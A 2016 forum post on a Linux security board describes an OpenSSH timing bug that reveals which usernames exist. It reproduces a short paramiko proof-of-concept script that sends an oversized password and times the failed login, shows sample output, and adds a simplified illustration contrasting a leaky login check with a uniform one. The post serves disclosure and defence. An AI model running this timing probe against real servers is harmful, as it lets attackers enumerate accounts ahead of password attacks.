
OpenSSH user enumeration bug

Discussion in 'Linux Security discussion' started by Rob, Jul 18, 2016.

  1. Rob

    Rob Administrator Staff Member

    OpenSSH currently has a bug that will help would-be attackers figure out actual account names on your system by timing how long the server takes to respond to incorrect logins.

    According to this post on the full disclosure mailing list, if you query a server with a username and a password larger than 10kb, it will take longer to respond when it tries to authenticate with the incorrect password on an account that actually exists. When the username is wrong, it will respond in less time.

    Test code from the post above:
    Code:
    #!/usr/bin/python
    
    import paramiko
    import time
    user=raw_input("user: ")
    p='A'*25000
    ssh = paramiko.SSHClient()
    starttime=time.clock()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
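    try:
            ssh.connect('127.0.0.1', username=user,
            password=p)
    except Exception:
            # the login is expected to fail; only the elapsed time matters
            pass
    # take the end time outside the handler so it is set on every path
    endtime=time.clock()
    total=endtime-starttime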
    print(total)
    Sample output:
    Code:
    rob@linuxforum.com [/usr/local/bin]# ./usertest.py
    user: slfj
    0.24
    rob@linuxforum.com [/usr/local/bin]# ./usertest.py
    user: blah
    0.23
    rob@linuxforum.com [/usr/local/bin]# ./usertest.py
    user: realuser
    0.29
    Patches should be available shortly - we'll update this when we see some pop out.
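
Added example (not part of Rob's post and not OpenSSH's code): a simplified model of this class of leak, where a login check that does expensive password hashing only for accounts that exist is compared with one that does the same work for every username. The account table, the hash routine, the placeholder entry and the byte counter (which stands in for response time) are all constructed for the illustration.

```python
import hashlib
import hmac

ROUNDS = 50          # constructed cost parameter
bytes_hashed = 0     # work counter standing in for server response time

def slow_hash(password, salt):
    """Iterated SHA-512; cost grows with password length."""
    global bytes_hashed
    digest = salt
    for _ in range(ROUNDS):
        data = digest + password
        bytes_hashed += len(data)
        digest = hashlib.sha512(data).digest()
    return digest

# Constructed account table: username -> (salt, hash). Not real data.
USERS = {"realuser": (b"salt-001", slow_hash(b"correct horse", b"salt-001"))}
# Placeholder entry, same salt length, used for unknown usernames.
DUMMY = (b"salt-000", slow_hash(b"placeholder", b"salt-000"))

def check_leaky(user, password):
    """Returns early for unknown users, so they cost no hashing."""
    entry = USERS.get(user)
    if entry is None:
        return False
    salt, stored = entry
    return hmac.compare_digest(slow_hash(password, salt), stored)

def check_uniform(user, password):
    """Does the same hashing whether or not the user exists."""
    salt, stored = USERS.get(user, DUMMY)
    matches = hmac.compare_digest(slow_hash(password, salt), stored)
    return matches and user in USERS

def work(check, user, password):
    """Bytes hashed while handling one login attempt."""
    global bytes_hashed
    bytes_hashed = 0
    check(user, password)
    return bytes_hashed

if __name__ == "__main__":
    long_pw = b"A" * 25000   # same size as the password in the post
    for check in (check_leaky, check_uniform):
        for user in ("blah", "realuser"):
            print(check.__name__, user, work(check, user, long_pw))
```

In the leaky version the work gap between the two usernames grows with the password length, which is why an oversized password makes the difference easy to see; the uniform version reports identical work for both.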
     
